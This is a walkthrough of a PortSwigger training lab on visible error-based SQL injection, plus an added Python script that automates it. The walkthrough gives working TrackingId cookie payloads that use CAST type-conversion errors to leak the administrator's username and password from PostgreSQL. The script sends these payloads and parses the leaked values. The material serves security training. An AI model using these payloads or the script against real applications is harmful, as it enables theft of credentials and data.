Lab: Visible error-based SQL injection
https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based
Lab objective: Log in as the administrator user.
The database contains a different table called users, with columns called username and password.
- Append a single quote to the TrackingId cookie:
    TrackingId=91dZKqS8SFDON8r9'
  The error message leaks the query the application built:
    SELECT * FROM tracking WHERE id = '91dZKqS8SFDON8r9''
  The extra quote leaves the string literal unterminated. Comment out the rest of the query so the trailing quote is ignored and the query parses again:
    TrackingId=91dZKqS8SFDON8r9'-- -
- Next, check whether CAST() can be used to provoke a type-conversion error. CAST() converts between types (string to number, number to string), and when the conversion fails PostgreSQL reports the value it tried to convert:
    TrackingId=91dZKqS8SFDON8r9' AND CAST((SELECT 1) as int)--
  This query returns the error:
    ERROR: argument of AND must be type boolean, not type integer Position: 63
  AND expects a boolean operand, but CAST((SELECT 1) as int) is an integer, so the expression has to be turned into a boolean comparison.
- New query:
    TrackingId=91dZKqS8SFDON8r9' AND 1=CAST((SELECT 1) as int)--
  This produces no error, so the injected comparison is accepted.
- To read a username, cast the subquery result to an integer:
    TrackingId=91dZKqS8SFDON8r9' AND 1=CAST((SELECT username FROM users) as int)--
  The error is now:
    Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = '91dZKqS8SFDON8r9' AND 1=CAST((SELECT username FROM users) as'. Expected char
  The query shown in the error stops before "int)--": the application truncates the cookie value at a fixed length, so the payload is being cut off and must be shortened.
- Remove the original tracking ID value to free up characters:
    TrackingId=' AND 1=CAST((SELECT username FROM users) as int)--
  This gives a different error:
    ERROR: more than one row returned by a subquery used as an expression
  The subquery is used as a scalar value, so it must return exactly one row.
- Add LIMIT 1 to the subquery:
    TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) as int)--
  The cast fails and the error message leaks the first username:
    ERROR: invalid input syntax for type integer: "administrator"
  LIMIT 1 returns whichever row comes first; here it is administrator. If it were not, a WHERE username='administrator' clause would select the wanted row instead.
- Use the same query for the password column:
    TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) as int)--
  The error leaks the password:
    ERROR: invalid input syntax for type integer: "41r5a8xg35x3mt8iwqqi"
- Log in as administrator with the leaked password to solve the lab.
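The steps above can be driven from a short script instead of editing the cookie by hand in Burp. The following Python is an added example and is not part of the original write-up or of PortSwigger's lab material: it sends each TrackingId value from the walkthrough, classifies the PostgreSQL error that comes back (not boolean, truncated payload, multiple rows, or a leaked value) and pulls the leaked value out of the page. The lab URL is a placeholder that must be replaced with your own instance, the cookie is sent raw in a Cookie header (an assumption about how the lab accepts it), and the sample responses are constructed from the error strings quoted above so the parsing can be exercised offline.

```python
import html
import re
import urllib.error
import urllib.request

# Hypothetical placeholder: replace with your own lab instance URL.
LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/"

# Injection stages from the write-up, in order. Each value is the raw
# TrackingId cookie; the comment shows the SQL the server ends up building.
STAGES = {
    # SELECT * FROM tracking WHERE id = '91dZKqS8SFDON8r9''  -> unterminated string
    "break_quote": "91dZKqS8SFDON8r9'",
    # ... AND CAST((SELECT 1) as int)--  -> AND needs a boolean operand
    "cast_probe": "91dZKqS8SFDON8r9' AND CAST((SELECT 1) as int)--",
    # ... AND 1=CAST((SELECT 1) as int)--  -> accepted, no error
    "cast_bool": "91dZKqS8SFDON8r9' AND 1=CAST((SELECT 1) as int)--",
    # original id dropped to fit the length limit, LIMIT 1 for a scalar subquery
    "leak_username": "' AND 1=CAST((SELECT username FROM users LIMIT 1) as int)--",
    "leak_password": "' AND 1=CAST((SELECT password FROM users LIMIT 1) as int)--",
}

# Patterns for the PostgreSQL error strings seen in the write-up.
LEAK_RE = re.compile(r'invalid input syntax for type integer: "([^"]*)"')
TRUNCATED_RE = re.compile(r"Unterminated string literal")
MULTI_ROW_RE = re.compile(r"more than one row returned by a subquery")
NOT_BOOL_RE = re.compile(r"argument of AND must be type boolean")


def classify_error(body: str) -> str:
    """Map a response body to the failure mode the write-up walks through."""
    text = html.unescape(body)  # the page HTML-escapes quotes in the error text
    if LEAK_RE.search(text):
        return "leak"           # cast failed: the quoted value is the data we want
    if TRUNCATED_RE.search(text):
        return "truncated"      # payload too long: shorten it (drop the original id)
    if MULTI_ROW_RE.search(text):
        return "multiple_rows"  # subquery must be scalar: add LIMIT 1 or a WHERE clause
    if NOT_BOOL_RE.search(text):
        return "not_boolean"    # wrap CAST(...) in a comparison such as 1=CAST(...)
    return "none"


def leaked_value(body: str):
    """Return the string PostgreSQL failed to cast, or None if no such error is present."""
    m = LEAK_RE.search(html.unescape(body))
    return m.group(1) if m else None


def fetch(cookie_value: str, url: str = LAB_URL) -> str:
    """Send one request with the raw cookie value and return the body (network; not run offline)."""
    req = urllib.request.Request(url, headers={"Cookie": f"TrackingId={cookie_value}"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:  # a SQL error answers with 5xx; the body still holds the message
        return e.read().decode(errors="replace")


# Constructed sample responses (not captured from the lab), built from the
# error strings quoted in the write-up, with quotes HTML-escaped as a page would.
SAMPLE_RESPONSES = {
    "cast_probe": "<p>ERROR: argument of AND must be type boolean, not type integer Position: 63</p>",
    "username_too_long": ("Unterminated string literal started at position 95 in SQL SELECT * FROM tracking "
                          "WHERE id = &apos;91dZKqS8SFDON8r9&apos; AND 1=CAST((SELECT username FROM users) as&apos;. "
                          "Expected char"),
    "username_multi": "ERROR: more than one row returned by a subquery used as an expression",
    "leak_username": "ERROR: invalid input syntax for type integer: &quot;administrator&quot;",
    "leak_password": "ERROR: invalid input syntax for type integer: &quot;41r5a8xg35x3mt8iwqqi&quot;",
}


def run_offline():
    """Classify every constructed response and extract any leaked value."""
    return {name: (classify_error(body), leaked_value(body)) for name, body in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for name, (kind, value) in run_offline().items():
        print(f"{name:18s} {kind:14s} {value}")
    # Against a live instance: for name, cookie in STAGES.items(): print(name, classify_error(fetch(cookie)))
```

Against a live instance, loop over STAGES with fetch() and stop at the first "leak" classification; the same regex also works for other casts (for example to a date type) as long as the target database quotes the offending value in its error message.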